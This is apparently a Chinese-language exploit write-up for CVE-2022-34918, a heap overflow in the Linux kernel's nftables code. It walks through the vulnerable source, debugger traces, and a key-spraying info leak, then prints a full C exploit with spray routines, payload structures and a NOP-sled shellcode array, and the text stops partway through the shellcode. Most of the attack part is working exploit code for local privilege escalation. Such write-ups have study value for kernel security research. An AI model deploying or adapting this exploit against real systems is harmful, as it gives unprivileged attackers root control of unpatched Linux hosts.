if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
err = nft_delrule(&ctx, old_rule);
if (err < 0)
goto err_destroy_flow_rule;

trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}
list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (!trans) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}

if (info->nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(expr_info);
chain->use++;

if (flow)
nft_trans_flow_rule(trans) = flow;

if (nft_net->validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;

err_destroy_flow_rule:
if (flow)
nft_flow_rule_destroy(flow);
err_release_rule:
nf_tables_rule_release(&ctx, rule);
err_release_expr:
for (i = 0; i < n; i++) {
if (expr_info[i].ops) {
module_put(expr_info[i].ops->type->owner);
if (expr_info[i].ops->type->release_ops)
expr_info[i].ops->type->release_ops(expr_info[i].ops);
}
}
kvfree(expr_info);

return err;
}

expresssion 总共有如下多种类型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
&nft_counter_type,
};

漏洞分析

漏洞来自于 CVE-2022-34918,函数 nft_set_elem_init 存在堆溢出,溢出长度可达 64-16=48 字节,漏洞对象可以位于 kmalloc-{64,96,128,192}

先看 nft_set_elem_init 函数的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl,
const u32 *key, const u32 *key_end,
const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp); /* 这里的tmpl->len已经包括了desc.dlen */
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY))
memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen); /* 如果set->dlen不等于desc.dlen,则有可能发生溢出 */
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}
  • 函数 memcpy 使用的拷贝长度来自于 nft_set 对象,但拷贝的目标是 nft_set_ext,其大小来自于 nft_set_ext_tmpl 对象
  • 如果 kzalloc 申请的大小和 memcpy 拷贝的大小不匹配,则可能发生堆溢出

两个关键结构体的条目如下:

1
2
3
4
5
struct nft_set_ext {
u8 genmask;
u8 offset[NFT_SET_EXT_NUM];
char data[];
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen;
u8 dlen;
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

分析 nft_add_set_elem 函数,确定 tmpl->len 的初始化过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{

......

timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

......

if (nla[NFTA_SET_ELEM_KEY]) {
err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen); /* 将tmpl->len初始化为set->klen */
}

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen); /* 将tmpl->len初始化为set->klen */
}

......

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF],
set->objtype, genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

dreg = nft_type_to_reg(set->dtype);
list_for_each_entry(binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len); /* 将tmpl->len初始化为desc.len */
}

......

}
  • 在该函数中,tmpl->len 将被初始化为 desc.len(跟 set->dlen 没有必然的联系)

用于控制 tmpl->len 大小的 nft_data_desc 结构体可以被用户控制,相关函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data,
struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr); /* 据用户输入的attr来初始化desc和data */
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) { /* 想要触发堆溢出,desc->len必定小于set->dlen,因此需要NFT_DATA_VERDICT标志位 */
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

漏洞的触发链为:

  • nf_tables_newsetelem -> nft_add_set_elem -> nft_set_elem_init

入侵思路

核心步骤参考了该博客:基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践 (veritas501.github.io)

该 CVE 的堆溢出发生在 nftables 过滤器元素添加进入过滤器的过程(这个元素可以是任何一种可以用于过滤网络流量的类型,例如 IP 地址、端口号、协议类型等)

首先使用该堆溢出来覆盖 user_key_payload->datalen 用于泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT); /* 填充user_key_payload */

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
/* 填充hole并尝试堆溢出(填充刚刚释放的kmalloc-32) */
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
/* 堆喷id_buffer,查找被覆盖的user_key_payload */
printf("found keyring %d is corrupted!", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}
  • 通过 user_key_payload 做越界读,就可能读到 rcu.func 中的 user_free_payload_rcu 这个函数指针,从而泄露出内核代码段地址

调试信息如下:

1
2
*RDI  0xffff88800fae9548 ◂— 0x2fb0
*RSI 0xffffc90000607828 ◂— 0x0
1
0xffffffff81b96fdf <nft_set_elem_init+367>    rep movsq qword ptr [rdi], qword ptr [rsi]
1
2
3
4
pwndbg> telescope 0xffff88800fae9548
00:00000xffff88800fae9548 ◂— 0x0
01:0008│ rdi 0xffff88800fae9550 ◂— 0x8000
02:00100xffff88800fae9558 ◂— 'AAAAAAAAA'
1
2
3
4
pwndbg> telescope 0xffffc90000607828
00:00000xffffc90000607828 ◂— 0x0
01:0008│ rsi 0xffffc90000607830 —▸ 0xffffffff81b88000 (nfnetlink_rcv_batch+1456) ◂— mov qword ptr [r15 + 8], rax
02:00100xffffc90000607838 ◂— 0x1
  • user_key_payload->datalen(0xffff88800fae9550) 将会被覆盖为 0x8000
  • PS:这个 0xffffffff81b88000 源自于之前遗留的地址,我们只会使用其最后两字节

然后选择覆盖 ring buffer(pg_vec) 来打 USMA,将 user_free_payload_rcu 函数覆盖为 shellcode 即可(PS:可以使用大量的 nop 来填充 shellcode,增大打通的概率)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <linux/keyctl.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <sys/xattr.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <sys/types.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <semaphore.h>
#include <sched.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/utsname.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>
#include <linux/netlink.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nf_tables.h>

#include "kernelpwn.h"
#define ID 1337
#define SET_NAME "nameXXX"
#define LEAK_SET_NAME "leakXXX"
#define TABLE_NAME "tableXX"

#define IO_RING_CTX_REF_FREE_OFFSET 0xc4235d // ????????? ffffffff81c4235d t io_ring_ctx_ref_free
#define IO_RSRC_NODE_REF_ZERO_OFFSET 0xc42517 // ????????? ffffffff81c42517 t io_rsrc_node_ref_zero

// spray in kmalloc-64
#define KEY_DESC_MAX_SIZE 40
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define PREFIX_BUF_LEN (16)
#define RCU_HEAD_LEN (16)
#define SPRAY_KEY_CNT (150)

#define FREE_HOLE_BEGIN (100)
#define FREE_HOLE_STEP (10)

#define CORRUPT_SIZE (0x8000)

#define PHYSMAP_MASK 0xffffffff00000000

#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)

#define PAGE_SIZE 0x1000

struct leak_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
uint16_t len;
} __attribute__((packed));

struct write_payload {
uint8_t prefix[PREFIX_BUF_LEN];
char *pg_vec;
char *pg_vec2; // in case shellcode is too long
} __attribute__((packed));

typedef int32_t key_serial_t;

void spray_keyring(key_serial_t *id_buffer, uint32_t spray_size) {
char key_desc[0x20];
char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

for (uint32_t i = 0; i < spray_size; i++) {
snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
for (int j = 0; j < 3; j++) {
// retry, after KEYCTL_REVOKE, the key is scheduled for garbage collection,
// so it is not freed immediately
id_buffer[i] = key_alloc(key_desc, key_payload, 0x20);
if (id_buffer[i] < 0) {
usleep(100 * 1000); // 100ms
} else {
break;
}
}

if (id_buffer[i] < 0) {
err_exit("add_key");
}
}
}

uint8_t shellcode[] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

0x48, 0x8d, 0x3d, 0x00, 0x10, 0x00, 0x00, 0xeb, 0x00, 0x55, 0x41, 0x57,
0x41, 0x56, 0x41, 0x54, 0x53, 0x49, 0x89, 0xfc, 0x48, 0x8d, 0x35, 0xfd,
0x01, 0x00, 0x00, 0x6a, 0x0d, 0x5a, 0xe8, 0x85, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x71, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x48,
0x8d, 0x35, 0xef, 0x01, 0x00, 0x00, 0x6a, 0x14, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x67, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x53, 0x01,
0x00, 0x00, 0x48, 0x63, 0x2b, 0x48, 0x01, 0xdd, 0x48, 0x63, 0x08, 0x48,
0x01, 0xc1, 0x31, 0xff, 0xff, 0xd1, 0x48, 0x89, 0xc7, 0xff, 0xd5, 0x48,
0x8d, 0x35, 0xd3, 0x01, 0x00, 0x00, 0x6a, 0x0a, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x37, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x23, 0x01,
0x00, 0x00, 0x48, 0x89, 0xc3, 0x48, 0x8d, 0x35, 0xbf, 0x01, 0x00, 0x00,
0x6a, 0x09, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0x19, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x05, 0x01, 0x00, 0x00, 0x48, 0x63, 0x0b, 0x48,
0x01, 0xd9, 0x48, 0x63, 0x18, 0x48, 0x01, 0xc3, 0x6a, 0x01, 0x5f, 0xff,
0xd1, 0x48, 0x89, 0xc7, 0x31, 0xf6, 0xff, 0xd3, 0x49, 0x89, 0xc6, 0x48,
0x8d, 0x35, 0x92, 0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7,
